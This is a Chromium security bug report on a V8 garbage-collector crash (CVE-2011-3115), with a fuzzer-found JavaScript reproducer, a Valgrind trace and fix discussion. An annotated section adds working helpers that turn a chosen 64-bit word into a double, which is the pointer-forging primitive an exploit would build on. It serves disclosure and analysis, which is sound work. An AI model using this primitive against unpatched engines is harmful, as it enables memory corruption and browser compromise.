
Issue metadata

Status: Fixed
Owner:
Closed: May 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




[LangFuzz] Crash in v8::internal::ShortCircuitConsString with invalid read

Reported by decoder...@gmail.com, May 14 2012

Issue description

VULNERABILITY DETAILS
The JavaScript code below crashes the d8 shell (tested on branch 3.10, revision 11522, which is in the latest Chromium dev 20.0.1132.3) on the heap with an invalid write to a strange address.

I was not able to get a trace in Chromium itself because my test uses gc() and I don't have a debug build available that allows using --expose-gc (does Google provide Linux debug builds for download?)

VERSION
Chrome Version: 20.0.1132.3 dev (only tested through shell rev 11522)
Operating System: Ubuntu 12.04 64 bit

REPRODUCTION CASE
// LangFuzz test case as posted; the comments are the editor's. Run with d8 --expose-gc so gc() exists.
function KeyedStoreIC(a) { a[(1)] = Math.E; }   // keyed store of a double (Math.E) at index 1
var literal = [1.2];        // array literal whose backing store holds an unboxed double
literal.length = 0;         // truncate the array
literal.push('0' && 0 );    // '0' && 0 evaluates to the small integer 0, pushed at index 0
KeyedStoreIC(literal);      // store the double Math.E at index 1
gc();                       // marking then reads Math.E's bit pattern (0x4005bf0a8b145769; the trace below shows it with the tag bit cleared) as an object pointer

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:

Valgrind trace in d8:

==19952== Invalid read of size 8
==19952==    at 0x52E7BC: v8::internal::ShortCircuitConsString(v8::internal::Object**) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5378A0: v8::internal::FlexibleBodyVisitor<v8::internal::StaticMarkingVisitor, v8::internal::FixedArray::BodyDescriptor, void>::Visit(v8::internal::Map*, v8::internal::HeapObject*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53AD80: v8::internal::MarkCompactCollector::EmptyMarkingDeque() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4FD6E5: v8::internal::Isolate::Iterate(v8::internal::ObjectVisitor*, v8::internal::ThreadLocalTop*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4A7388: v8::internal::Heap::IterateStrongRoots(v8::internal::ObjectVisitor*, v8::internal::VisitMode) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53BA3F: v8::internal::MarkCompactCollector::MarkLiveObjects() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5404B8: v8::internal::MarkCompactCollector::CollectGarbage() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ABE07: v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector, v8::internal::GCTracer*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4AC623: v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollector, char const*, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ACE6A: v8::internal::Heap::CollectAllGarbage(int, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x46CC4E: v8::internal::GCExtension::GC(v8::Arguments const&) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x43D1F7: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==  Address 0x4005bf0a8b145768 is not stack'd, malloc'd or (recently) free'd

Owner: danno@chromium.org
Status: Assigned
Danno, can you please take a look.

Christian, you can download asanified chromium debug builds from https://commondatastorage.googleapis.com/chromium-browser-asan/index.html

Comment 2 by danno@chromium.org, May 14 2012

Cc: erikcorry@google.com yangguo@chromium.org

Comment 3 by danno@chromium.org, May 15 2012

I am virtually positive that this is the same as chromium:117409, which was fixed on May 9th on V8 trunk but just rolled into Chromium today. I'll double check. It is also in Chrome 20 and Chrome 19, but not Chrome 18. I'm waiting for the merge until we verify that the fix is stable in Canary.
I'm always testing on v8-trunk, not on the branches, and it reproduced for me on trunk when I reported it here.

Comment 5 by danno@chromium.org, May 15 2012

Looks like there's still a problem, this seems to be a new variant on the theme of 117409. Investigating. 

Comment 6 by danno@chromium.org, May 15 2012

It is similar but a slightly different case than 117409. Patch in progress, it will need to be merged back to 18 and 19. This bug allows you to reliably write the first element of a JSArray with any value that you can represent in the lower 32 bits of an IEEE double precision floating point number and later interpret as a tagged value, including as an object pointer.
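The faulting address in the Valgrind trace above and the "write a double, have it read back as a tagged value" primitive described in this comment, worked through as an added example. This is editor-written code, not the reporter's test case and not V8 code. It assumes the x64 V8 tagging scheme of the time, which the page itself does not state: a 64-bit word with low bit 1 is a heap-object pointer whose raw address is the word minus 1, and a word with low bit 0 is a Smi carrying its 32-bit payload in the upper half.

```javascript
// Added example (editor's code, not from the bug report or V8).
// Assumed tagging scheme (x64 V8 of this era, not stated on the page):
//   low bit 1 -> heap object, raw address = word - 1
//   low bit 0 -> Smi, signed 32-bit payload in the upper 32 bits

// Raw IEEE-754 bit pattern of a double, as an unsigned 64-bit BigInt.
function doubleToBits(x) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, x);            // big-endian: most significant byte first
  return view.getBigUint64(0);
}

// Inverse: the double whose bit pattern is the given 64-bit word.
function bitsToDouble(bits) {
  const view = new DataView(new ArrayBuffer(8));
  view.setBigUint64(0, BigInt.asUintN(64, bits));
  return view.getFloat64(0);
}

function hex64(bits) {
  return "0x" + bits.toString(16).padStart(16, "0");
}

// Decode a 64-bit word the way the assumed tagging scheme would.
function interpretAsTagged(bits) {
  if ((bits & 1n) === 1n) {
    return { kind: "HeapObject", address: bits - 1n };
  }
  return { kind: "Smi", value: Number(BigInt.asIntN(32, bits >> 32n)) };
}

// Can a chosen 64-bit word be carried through a double unchanged?
// Words in the NaN range (exponent all ones, non-zero mantissa) may be
// canonicalised by the engine, so they are not reliable carriers; every
// other pattern is a normal, subnormal or infinite double and round-trips.
function survivesAsDouble(bits) {
  return doubleToBits(bitsToDouble(bits)) === BigInt.asUintN(64, bits);
}

// The crash, step by step: Math.E is stored as raw double bits into a
// backing store that the collector later walks as tagged words.
function explainCrash() {
  const bits = doubleToBits(Math.E);        // 0x4005bf0a8b145769
  const tagged = interpretAsTagged(bits);   // low bit set, so "heap object"
  return {
    bits: hex64(bits),
    kind: tagged.kind,
    address: tagged.kind === "HeapObject" ? hex64(tagged.address) : null,
  };
}

console.log(explainCrash());
// { bits: '0x4005bf0a8b145769', kind: 'HeapObject', address: '0x4005bf0a8b145768' }
```

The address the marker dereferences, 0x4005bf0a8b145768, is exactly Math.E's bit pattern with the tag bit stripped, which matches the "not stack'd, malloc'd or (recently) free'd" report in the trace: the collector is following a double as if it were a pointer. bitsToDouble shows the other direction of the primitive, choosing the word first and deriving the double that encodes it; survivesAsDouble is the check a practitioner would run before relying on a given word, since NaN-space patterns are the ones an engine may rewrite.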

Comment 7 by danno@chromium.org, May 15 2012

Cc: mstarzinger@chromium.org
Labels: SecSeverity-High SecImpacts-Stable SecImpacts-Beta reward-topanel
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals WebKit-JavaScript OS-All Mstone-19
Danno, isn't 117409 a security bug too? We need the tracking flags.

Comment 11 by danno@chromium.org, May 16 2012

Yes, sorry, 117409 is also a security bug, I thought it was already marked so. I've changed it to restrict viewing to the security team and be typed as a Security bug. Chris, can you please work your magic on the other security labels.

Comment 12 by danno@chromium.org, May 21 2012

Fix has been committed to trunk/Canary and merged back to 3.10 (3.10.8.9) and 3.9 (3.9.24.27). 
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
Nice find decoder. $1000
Labels: CVE-2011-3115
Status: Fixed
Fixed with the release of 19.0.1084.52
Labels: -reward-unpaid
Cc: holi...@gmail.com

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -WebKit-JavaScript -Mstone-19 M-19 Cr-Content-JavaScript Security-Impact-Stable Security-Impact-Beta Cr-Internals Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 24 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: Cr-Blink

Comment 26 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-JavaScript Cr-Blink-JavaScript

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
